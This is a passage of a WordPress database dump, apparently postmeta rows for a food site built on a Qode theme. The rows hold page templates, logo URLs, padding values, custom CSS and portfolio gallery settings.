!important;padding-bottom: 95px !important;}'),(4352,2705,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4353,2705,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4354,2705,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4355,2705,'qodef_top_bar_meta','no'),(4356,2716,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4357,2716,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4358,2716,'_wp_page_template','full-width.php'),(4359,2716,'slide_template','default'),(4360,2716,'_wpb_vc_js_status','true'),(4361,2716,'qodef_page_content_behind_header_meta','no'),(4362,2716,'qodef_boxed_background_image_attachment_meta','fixed'),(4363,2716,'qodef_disable_vertical_header_background_image_meta','no'),(4364,2716,'qodef_disable_header_widget_logo_area_meta','no'),(4365,2716,'qodef_disable_header_widget_menu_area_meta','no'),(4366,2716,'qodef_page_content_top_padding','0'),(4367,2716,'qodef_page_content_top_padding_mobile','yes'),(4368,2716,'qodef_header_type_meta','header-standard'),(4369,2716,'qodef_title_area_type_meta','breadcrumbs'),(4370,2716,'qodef_title_area_height_meta','140'),(4371,2716,'qodef_title_area_title_tag_meta','h2'),(4372,2716,'qodef_set_menu_area_position_meta','center'),(4373,2716,'_dp_original','1338'),(4374,2716,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4375,2716,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4376,2716,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4377,2716,'qodef_top_bar_meta','no'),(4378,3382,'_wpb_shortcodes_custom_css','.vc_custom_1519815581147{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1519815363184{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1519815353159{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1519815319469{padding-top: 0px !important;padding-bottom: 170px !important;}.vc_custom_1519725639819{padding-top: 148px !important;padding-bottom: 116px !important;}.vc_custom_1519725875118{background-color: #f7f7f7 !important;}.vc_custom_1520586912867{padding-top: 24px !important;padding-bottom: 60px !important;}.vc_custom_1519725968851{margin-top: -162px !important;}.vc_custom_1519726211533{margin-top: -95px !important;}.vc_custom_1520604667316{padding-right: 11% !important;}.vc_custom_1519729564164{margin-top: -50px !important;}'),(4379,3382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4380,3382,'_wp_page_template','coming-soon-page.php'),(4381,3382,'slide_template','default'),(4382,3382,'_wpb_vc_js_status','true'),(4383,3382,'qodef_page_content_behind_header_meta','no'),(4384,3382,'qodef_boxed_background_image_attachment_meta','fixed'),(4385,3382,'qodef_disable_vertical_header_background_image_meta','no'),(4386,3382,'qodef_disable_header_widget_logo_area_meta','no'),(4387,3382,'qodef_disable_header_widget_menu_area_meta','no'),(4388,3382,'qodef_page_content_top_padding','0'),(4389,3382,'qodef_page_content_top_padding_mobile','yes'),(4390,3382,'_wpb_shortcodes_custom_css','.vc_custom_1519815581147{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1519815363184{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1519815353159{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1519815319469{padding-top: 0px !important;padding-bottom: 170px !important;}.vc_custom_1519725639819{padding-top: 148px !important;padding-bottom: 116px !important;}.vc_custom_1519725875118{background-color: #f7f7f7 !important;}.vc_custom_1520586912867{padding-top: 24px !important;padding-bottom: 60px !important;}.vc_custom_1519725968851{margin-top: -162px !important;}.vc_custom_1519726211533{margin-top: -95px !important;}.vc_custom_1520604667316{padding-right: 11% !important;}.vc_custom_1519729564164{margin-top: -50px !important;}'),(4391,3382,'qodef_initial_content_width_meta','qodef-grid-1300'),(4392,3382,'qodef_smooth_page_transitions_meta','yes'),(4393,3382,'qodef_page_transition_preloader_meta','yes'),(4394,3382,'qodef_smooth_pt_bgnd_color_meta','#ffffff'),(4395,3382,'qodef_smooth_pt_spinner_type_meta','succulents_loader'),(4396,3382,'_wpb_post_custom_css','.qodef-image-with-text-holder.qodef-image-behavior-custom-link .qodef-iwt-image a:hover:after {\ndisplay:none;\n \n}\n\n.qodef-image-with-text-holder.qodef-image-behavior-custom-link .qodef-iwt-image a {\n -webkit-transition: transform .3s cubic-bezier(.48,.19,.2,.86);\n transition: transform .3s cubic-bezier(.48,.19,.2,.86);\n}\n\n.qodef-image-with-text-holder.qodef-image-behavior-custom-link .qodef-iwt-image a:hover {\n-webkit-transform: translateY(-5px);\ntransform: translateY(-5px);\n}\n\n.qodef-element-from-fade.qodef-element-from-fade-on>div {\n -webkit-transition: opacity 1.2s ease 0s;\n transition: opacity 1.2s ease 0s;\n}'),(4397,3772,'_wpb_shortcodes_custom_css','.vc_custom_1521115630505{padding-bottom: 124px !important;}'),(4398,3772,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4399,3772,'_wp_page_template','full-width.php'),(4400,3772,'slide_template','default'),(4401,3772,'_wpb_vc_js_status','true'),(4402,3772,'qodef_page_content_behind_header_meta','no'),(4403,3772,'qodef_boxed_background_image_attachment_meta','fixed'),(4404,3772,'qodef_disable_vertical_header_background_image_meta','no'),(4405,3772,'qodef_disable_header_widget_logo_area_meta','no'),(4406,3772,'qodef_disable_header_widget_menu_area_meta','no'),(4407,3772,'qodef_page_content_top_padding','40'),(4408,3772,'qodef_page_content_top_padding_mobile','yes'),(4409,3772,'qodef_title_area_height_meta','140'),(4410,3772,'qodef_title_area_title_tag_meta','h2'),(4411,3772,'_wpb_shortcodes_custom_css','.vc_custom_1521115630505{padding-bottom: 124px !important;}'),(4412,3772,'qodef_show_title_area_meta','no'),(4415,3776,'_wp_page_template','blog-standard'),(4416,3776,'slide_template','default'),(4417,3776,'_wpb_vc_js_status','true'),(4418,3776,'qodef_page_content_behind_header_meta','no'),(4419,3776,'qodef_boxed_background_image_attachment_meta','fixed'),(4420,3776,'qodef_disable_vertical_header_background_image_meta','no'),(4421,3776,'qodef_disable_header_widget_logo_area_meta','no'),(4422,3776,'qodef_disable_header_widget_menu_area_meta','no'),(4423,3776,'qodef_show_title_area_meta','no'),(4424,3776,'qodef_sidebar_layout_meta','sidebar-33-right'),(4425,3776,'qodef_custom_sidebar_area_meta','home-6'),(4426,3776,'qodef_blog_category_meta','recipes'),(4427,3776,'qodef_show_posts_per_page_meta','5'),(4428,3776,'_dp_original','1117'),(4429,3776,'qodef_title_area_type_meta','standard'),(4430,3776,'qodef_title_area_height_meta','140'),(4431,3776,'qodef_title_area_title_tag_meta','h2'),(4433,3776,'qodef_page_content_top_padding_mobile','yes'),(4434,3779,'_wpb_shortcodes_custom_css','.vc_custom_1520421074048{padding-top: 85px !important;padding-bottom: 130px !important;}'),(4435,3779,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4436,3779,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4437,3779,'_wp_page_template','full-width.php'),(4438,3779,'slide_template','default'),(4439,3779,'_wpb_vc_js_status','true'),(4440,3779,'qodef_page_content_behind_header_meta','no'),(4441,3779,'qodef_boxed_background_image_attachment_meta','fixed'),(4442,3779,'qodef_disable_vertical_header_background_image_meta','no'),(4443,3779,'qodef_disable_header_widget_logo_area_meta','no'),(4444,3779,'qodef_disable_header_widget_menu_area_meta','no'),(4445,3779,'qodef_page_content_top_padding','0'),(4446,3779,'qodef_page_content_top_padding_mobile','yes'),(4447,3779,'qodef_title_area_height_meta','140'),(4448,3779,'qodef_title_area_title_tag_meta','h2'),(4449,3779,'_dp_original','3772'),(4450,3779,'_wpb_shortcodes_custom_css','.vc_custom_1520421074048{padding-top: 85px !important;padding-bottom: 130px !important;}'),(4451,3779,'qodef_header_type_meta','header-standard'),(4452,3779,'qodef_title_area_type_meta','breadcrumbs'),(4453,3779,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4454,3779,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4455,3779,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4456,3779,'qodef_top_bar_meta','no'),(4457,4125,'_wpb_shortcodes_custom_css','.vc_custom_1521032927826{padding-top: 19px !important;padding-bottom: 15px !important;}.vc_custom_1520426337327{padding-top: 0px !important;padding-bottom: 23px !important;}.vc_custom_1520426345152{padding-top: 0px !important;padding-bottom: 25px !important;}.vc_custom_1520426356665{padding-top: 0px !important;padding-bottom: 28px !important;}.vc_custom_1520426364753{padding-bottom: 32px !important;}.vc_custom_1521032941280{padding-top: 0px !important;padding-bottom: 83px !important;}'),(4458,4125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4459,4125,'_wpb_shortcodes_custom_css','.vc_custom_1521032927826{padding-top: 19px !important;padding-bottom: 15px !important;}.vc_custom_1520426337327{padding-top: 0px !important;padding-bottom: 23px !important;}.vc_custom_1520426345152{padding-top: 0px !important;padding-bottom: 25px !important;}.vc_custom_1520426356665{padding-top: 0px !important;padding-bottom: 28px !important;}.vc_custom_1520426364753{padding-bottom: 32px !important;}.vc_custom_1521032941280{padding-top: 0px !important;padding-bottom: 83px !important;}'),(4460,4125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4461,4125,'_wp_page_template','full-width.php'),(4462,4125,'slide_template','default'),(4463,4125,'_wpb_vc_js_status','true'),(4464,4125,'qodef_page_content_behind_header_meta','no'),(4465,4125,'qodef_boxed_background_image_attachment_meta','fixed'),(4466,4125,'qodef_disable_vertical_header_background_image_meta','no'),(4467,4125,'qodef_disable_header_widget_logo_area_meta','no'),(4468,4125,'qodef_disable_header_widget_menu_area_meta','no'),(4469,4125,'qodef_show_title_area_meta','yes'),(4470,4125,'_wpb_shortcodes_custom_css','.vc_custom_1521032927826{padding-top: 19px !important;padding-bottom: 15px !important;}.vc_custom_1520426337327{padding-top: 0px !important;padding-bottom: 23px !important;}.vc_custom_1520426345152{padding-top: 0px !important;padding-bottom: 25px !important;}.vc_custom_1520426356665{padding-top: 0px !important;padding-bottom: 28px !important;}.vc_custom_1520426364753{padding-bottom: 32px !important;}.vc_custom_1521032941280{padding-top: 0px !important;padding-bottom: 83px !important;}'),(4471,4125,'qodef_title_area_type_meta','breadcrumbs'),(4472,4125,'qodef_title_area_height_meta','140'),(4473,4125,'qodef_title_area_title_tag_meta','h2'),(4474,4125,'_dp_original','19'),(4475,4125,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4476,4125,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4477,4125,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(4478,4125,'qodef_top_bar_meta','no'),(4479,4125,'qodef_header_type_meta','header-standard'),(4480,4125,'qodef_set_menu_area_position_meta','center'),(4481,1438,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4482,1438,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4483,1438,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4484,1438,'qodef_page_content_behind_header_meta','no'),(4485,1438,'qodef_boxed_background_image_attachment_meta','fixed'),(4486,1438,'qodef-portfolio-image-gallery','1435,1434,1445'),(4487,1438,'qodef_portfolio_single_template_meta','small-images'),(4488,1438,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4489,1438,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4490,1438,'portfolio_single_back_to_link','1730'),(4491,1438,'qodef_disable_vertical_header_background_image_meta','no'),(4492,1438,'qodef_disable_header_widget_logo_area_meta','no'),(4493,1438,'qodef_disable_header_widget_menu_area_meta','no'),(4494,1438,'slide_template','default'),(4495,1438,'_wpb_vc_js_status','true'),(4496,1438,'qodef_title_area_type_meta','breadcrumbs'),(4497,1438,'qodef_page_content_top_padding','76'),(4498,1438,'qodef_page_content_top_padding_mobile','yes'),(4499,1438,'qodef_title_area_height_meta','140'),(4500,1438,'qodef_title_area_title_tag_meta','h2'),(4501,1438,'_wp_old_slug','full-width-images'),(4502,1438,'_wp_old_slug','full-width-images-2'),(4503,1438,'_wp_old_slug','images'),(4504,1438,'_dp_original','1437'),(4505,1438,'_wp_old_slug','big-images'),(4506,1438,'_thumbnail_id','1536'),(4507,1438,'_wp_old_slug','small-images'),(4508,1440,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4509,1440,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4510,1440,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4511,1440,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4512,1440,'qodef_page_content_behind_header_meta','no'),(4513,1440,'qodef_boxed_background_image_attachment_meta','fixed'),(4514,1440,'qodef-portfolio-image-gallery','1435,1434,1445'),(4515,1440,'qodef_portfolio_single_template_meta','slider'),(4516,1440,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4517,1440,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4518,1440,'portfolio_single_back_to_link','1730'),(4519,1440,'qodef_disable_vertical_header_background_image_meta','no'),(4520,1440,'qodef_disable_header_widget_logo_area_meta','no'),(4521,1440,'qodef_disable_header_widget_menu_area_meta','no'),(4522,1440,'slide_template','default'),(4523,1440,'_wpb_vc_js_status','true'),(4524,1440,'qodef_title_area_type_meta','breadcrumbs'),(4525,1440,'qodef_page_content_top_padding','76'),(4526,1440,'qodef_page_content_top_padding_mobile','yes'),(4527,1440,'qodef_title_area_height_meta','140'),(4528,1440,'qodef_title_area_title_tag_meta','h2'),(4529,1440,'_wp_old_slug','full-width-images'),(4530,1440,'_wp_old_slug','full-width-images-2'),(4531,1440,'_wp_old_slug','images'),(4532,1440,'_wp_old_slug','big-images'),(4533,1440,'_dp_original','1438'),(4534,1440,'_wp_old_slug','small-images'),(4535,1440,'_wp_old_slug','slider'),(4536,1440,'_thumbnail_id','1547'),(4537,1440,'_wp_old_slug','big-slider'),(4538,1442,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4539,1442,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4540,1442,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4541,1442,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4542,1442,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4543,1442,'qodef_page_content_behind_header_meta','no'),(4544,1442,'qodef_boxed_background_image_attachment_meta','fixed'),(4545,1442,'qodef-portfolio-image-gallery','1435,1434,1445'),(4546,1442,'qodef_portfolio_single_template_meta','small-slider'),(4547,1442,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4548,1442,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4549,1442,'portfolio_single_back_to_link','1730'),(4550,1442,'qodef_disable_vertical_header_background_image_meta','no'),(4551,1442,'qodef_disable_header_widget_logo_area_meta','no'),(4552,1442,'qodef_disable_header_widget_menu_area_meta','no'),(4553,1442,'slide_template','default'),(4554,1442,'_wpb_vc_js_status','true'),(4555,1442,'qodef_title_area_type_meta','breadcrumbs'),(4556,1442,'qodef_page_content_top_padding','76'),(4557,1442,'qodef_page_content_top_padding_mobile','yes'),(4558,1442,'qodef_title_area_height_meta','140'),(4559,1442,'qodef_title_area_title_tag_meta','h2'),(4560,1442,'_wp_old_slug','full-width-images'),(4561,1442,'_wp_old_slug','full-width-images-2'),(4562,1442,'_wp_old_slug','images'),(4563,1442,'_wp_old_slug','big-images'),(4564,1442,'_wp_old_slug','small-images'),(4565,1442,'_wp_old_slug','slider'),(4566,1442,'_dp_original','1440'),(4567,1442,'_wp_old_slug','big-slider'),(4568,1442,'_wp_old_slug','big-slider-2'),(4569,1442,'_thumbnail_id','1548'),(4570,1442,'_wp_old_slug','small-slider'),(4571,1444,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4572,1444,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4573,1444,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4574,1444,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4575,1444,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4576,1444,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4577,1444,'qodef_page_content_behind_header_meta','no'),(4578,1444,'qodef_boxed_background_image_attachment_meta','fixed'),(4579,1444,'qodef-portfolio-image-gallery','1435,1434,1445,1458,1457,1456'),(4580,1444,'qodef_portfolio_single_template_meta','gallery'),(4581,1444,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4582,1444,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4583,1444,'portfolio_single_back_to_link','1730'),(4584,1444,'qodef_disable_vertical_header_background_image_meta','no'),(4585,1444,'qodef_disable_header_widget_logo_area_meta','no'),(4586,1444,'qodef_disable_header_widget_menu_area_meta','no'),(4587,1444,'slide_template','default'),(4588,1444,'_wpb_vc_js_status','true'),(4589,1444,'qodef_title_area_type_meta','breadcrumbs'),(4590,1444,'qodef_page_content_top_padding','76'),(4591,1444,'qodef_page_content_top_padding_mobile','yes'),(4592,1444,'qodef_title_area_height_meta','140'),(4593,1444,'qodef_title_area_title_tag_meta','h2'),(4594,1444,'_wp_old_slug','full-width-images'),(4595,1444,'_wp_old_slug','full-width-images-2'),(4596,1444,'_wp_old_slug','images'),(4597,1444,'_wp_old_slug','big-images'),(4598,1444,'_wp_old_slug','small-images'),(4599,1444,'_wp_old_slug','slider'),(4600,1444,'_wp_old_slug','big-slider'),(4601,1444,'_wp_old_slug','big-slider-2'),(4602,1444,'_dp_original','1442'),(4603,1444,'_wp_old_slug','small-slider'),(4604,1444,'_wp_old_slug','small-slider-2'),(4605,1444,'_thumbnail_id','1549'),(4606,1444,'_wp_old_slug','big-gallery'),(4607,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4608,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4609,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4610,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4611,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4612,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4613,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4614,1459,'qodef_page_content_behind_header_meta','no'),(4615,1459,'qodef_boxed_background_image_attachment_meta','fixed'),(4616,1459,'qodef-portfolio-image-gallery','1435,1434,1445,1458,1457,1456'),(4617,1459,'qodef_portfolio_single_template_meta','small-gallery'),(4618,1459,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4619,1459,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4620,1459,'portfolio_single_back_to_link','1730'),(4621,1459,'qodef_disable_vertical_header_background_image_meta','no'),(4622,1459,'qodef_disable_header_widget_logo_area_meta','no'),(4623,1459,'qodef_disable_header_widget_menu_area_meta','no'),(4624,1459,'slide_template','default'),(4625,1459,'_wpb_vc_js_status','true'),(4626,1459,'qodef_title_area_type_meta','breadcrumbs'),(4627,1459,'qodef_page_content_top_padding','76'),(4628,1459,'qodef_page_content_top_padding_mobile','yes'),(4629,1459,'qodef_title_area_height_meta','140'),(4630,1459,'qodef_title_area_title_tag_meta','h2'),(4631,1459,'_wp_old_slug','full-width-images'),(4632,1459,'_wp_old_slug','full-width-images-2'),(4633,1459,'_wp_old_slug','images'),(4634,1459,'_wp_old_slug','big-images'),(4635,1459,'_wp_old_slug','small-images'),(4636,1459,'_wp_old_slug','slider'),(4637,1459,'_wp_old_slug','big-slider'),(4638,1459,'_wp_old_slug','big-slider-2'),(4639,1459,'_wp_old_slug','small-slider'),(4640,1459,'_wp_old_slug','small-slider-2'),(4641,1459,'_dp_original','1444'),(4642,1459,'qodef_portfolio_single_gallery_columns_number_meta','two'),(4643,1459,'_thumbnail_id','1550'),(4644,1459,'_wp_old_slug','small-gallery'),(4645,1463,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4646,1463,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4647,1463,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4648,1463,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4649,1463,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4650,1463,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4651,1463,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4652,1463,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4653,1463,'qodef_page_content_behind_header_meta','no'),(4654,1463,'qodef_boxed_background_image_attachment_meta','fixed'),(4655,1463,'qodef-portfolio-image-gallery','4280,4278,3377,4333,4335'),(4656,1463,'qodef_portfolio_single_template_meta','masonry'),(4657,1463,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4658,1463,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4659,1463,'portfolio_single_back_to_link','1730'),(4660,1463,'qodef_disable_vertical_header_background_image_meta','no'),(4661,1463,'qodef_disable_header_widget_logo_area_meta','no'),(4662,1463,'qodef_disable_header_widget_menu_area_meta','no'),(4663,1463,'slide_template','default'),(4664,1463,'_wpb_vc_js_status','true'),(4665,1463,'qodef_title_area_type_meta','breadcrumbs'),(4666,1463,'qodef_page_content_top_padding','76'),(4667,1463,'qodef_page_content_top_padding_mobile','yes'),(4668,1463,'qodef_title_area_height_meta','140'),(4669,1463,'qodef_title_area_title_tag_meta','h2'),(4670,1463,'_wp_old_slug','full-width-images'),(4671,1463,'_wp_old_slug','full-width-images-2'),(4672,1463,'_wp_old_slug','images'),(4673,1463,'_wp_old_slug','big-images'),(4674,1463,'_wp_old_slug','small-images'),(4675,1463,'_wp_old_slug','slider'),(4676,1463,'_wp_old_slug','big-slider'),(4677,1463,'_wp_old_slug','big-slider-2'),(4678,1463,'_wp_old_slug','small-slider'),(4679,1463,'_wp_old_slug','small-slider-2'),(4680,1463,'qodef_portfolio_single_gallery_columns_number_meta','two'),(4681,1463,'_dp_original','1459'),(4682,1463,'_wp_old_slug','small-gallery'),(4683,1463,'qodef_portfolio_single_masonry_space_between_items_meta','normal'),(4684,1463,'_thumbnail_id','1552'),(4685,1463,'_wp_old_slug','big-masonry'),(4686,1474,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4687,1474,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4688,1474,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4689,1474,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4690,1474,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4691,1474,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4692,1474,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4693,1474,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4694,1474,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4695,1474,'qodef_page_content_behind_header_meta','no'),(4696,1474,'qodef_boxed_background_image_attachment_meta','fixed'),(4697,1474,'qodef-portfolio-image-gallery','4280,4278,3377,4333'),(4698,1474,'qodef_portfolio_single_template_meta','small-masonry'),(4699,1474,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4700,1474,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4701,1474,'portfolio_single_back_to_link','1730'),(4702,1474,'qodef_disable_vertical_header_background_image_meta','no'),(4703,1474,'qodef_disable_header_widget_logo_area_meta','no'),(4704,1474,'qodef_disable_header_widget_menu_area_meta','no'),(4705,1474,'slide_template','default'),(4706,1474,'_wpb_vc_js_status','true'),(4707,1474,'qodef_title_area_type_meta','breadcrumbs'),(4708,1474,'qodef_page_content_top_padding','76'),(4709,1474,'qodef_page_content_top_padding_mobile','yes'),(4710,1474,'qodef_title_area_height_meta','140'),(4711,1474,'qodef_title_area_title_tag_meta','h2'),(4712,1474,'_wp_old_slug','full-width-images'),(4713,1474,'_wp_old_slug','full-width-images-2'),(4714,1474,'_wp_old_slug','images'),(4715,1474,'_wp_old_slug','big-images'),(4716,1474,'_wp_old_slug','small-images'),(4717,1474,'_wp_old_slug','slider'),(4718,1474,'_wp_old_slug','big-slider'),(4719,1474,'_wp_old_slug','big-slider-2'),(4720,1474,'_wp_old_slug','small-slider'),(4721,1474,'_wp_old_slug','small-slider-2'),(4722,1474,'_wp_old_slug','small-gallery'),(4723,1474,'qodef_portfolio_single_masonry_space_between_items_meta','normal'),(4724,1474,'_dp_original','1463'),(4725,1474,'_wp_old_slug','big-masonry'),(4726,1474,'qodef_portfolio_single_masonry_columns_number_meta','two'),(4727,1474,'_thumbnail_id','1553'),(4728,1474,'_wp_old_slug','small-masonry'),(4729,1538,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4730,1538,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4731,1538,'qodef_page_content_behind_header_meta','no'),(4732,1538,'qodef_boxed_background_image_attachment_meta','fixed'),(4733,1538,'qodef-portfolio-image-gallery','1435,1434,1445'),(4734,1538,'qodef_portfolio_single_template_meta','huge-images'),(4735,1538,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4736,1538,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4737,1538,'portfolio_single_back_to_link','1730'),(4738,1538,'qodef_disable_vertical_header_background_image_meta','no'),(4739,1538,'qodef_disable_header_widget_logo_area_meta','no'),(4740,1538,'qodef_disable_header_widget_menu_area_meta','no'),(4741,1538,'slide_template','default'),(4742,1538,'_wpb_vc_js_status','true'),(4743,1538,'qodef_title_area_type_meta','breadcrumbs'),(4744,1538,'qodef_page_content_top_padding','76'),(4745,1538,'qodef_page_content_top_padding_mobile','yes'),(4746,1538,'qodef_title_area_height_meta','140'),(4747,1538,'qodef_title_area_in_grid_meta','no'),(4748,1538,'qodef_title_area_title_tag_meta','h2'),(4749,1538,'_thumbnail_id','1554'),(4750,1538,'_dp_original','1433'),(4751,1538,'_wp_old_slug','full-width-images'),(4752,1538,'_wp_old_slug','full-width-images-2'),(4753,1539,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4754,1539,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4755,1539,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4756,1539,'qodef_page_content_behind_header_meta','no'),(4757,1539,'qodef_boxed_background_image_attachment_meta','fixed'),(4758,1539,'qodef-portfolio-image-gallery','1435,1434,1445'),(4759,1539,'qodef_portfolio_single_template_meta','images'),(4760,1539,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4761,1539,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4762,1539,'portfolio_single_back_to_link','1730'),(4763,1539,'qodef_disable_vertical_header_background_image_meta','no'),(4764,1539,'qodef_disable_header_widget_logo_area_meta','no'),(4765,1539,'qodef_disable_header_widget_menu_area_meta','no'),(4766,1539,'slide_template','default'),(4767,1539,'_wpb_vc_js_status','true'),(4768,1539,'qodef_title_area_type_meta','breadcrumbs'),(4769,1539,'qodef_page_content_top_padding','76'),(4770,1539,'qodef_page_content_top_padding_mobile','yes'),(4771,1539,'qodef_title_area_height_meta','140'),(4772,1539,'qodef_title_area_title_tag_meta','h2'),(4773,1539,'_wp_old_slug','full-width-images'),(4774,1539,'_wp_old_slug','full-width-images-2'),(4775,1539,'_wp_old_slug','images'),(4776,1539,'_thumbnail_id','1560'),(4777,1539,'_dp_original','1437'),(4778,1539,'_wp_old_slug','big-images'),(4779,1539,'_wp_old_slug','big-images-2'),(4780,1540,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4781,1540,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4782,1540,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4783,1540,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(4784,1540,'qodef_page_content_behind_header_meta','no'),(4785,1540,'qodef_boxed_background_image_attachment_meta','fixed'),(4786,1540,'qodef-portfolio-image-gallery','1435,1434,1445'),(4787,1540,'qodef_portfolio_single_template_meta','small-images'),(4788,1540,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(4789,1540,'qodef_portfolio_masonry_original_dimensions_meta','default'),(4790,1540,'portfolio_single_back_to_link','1730'),(4791,1540,'qodef_disable_vertical_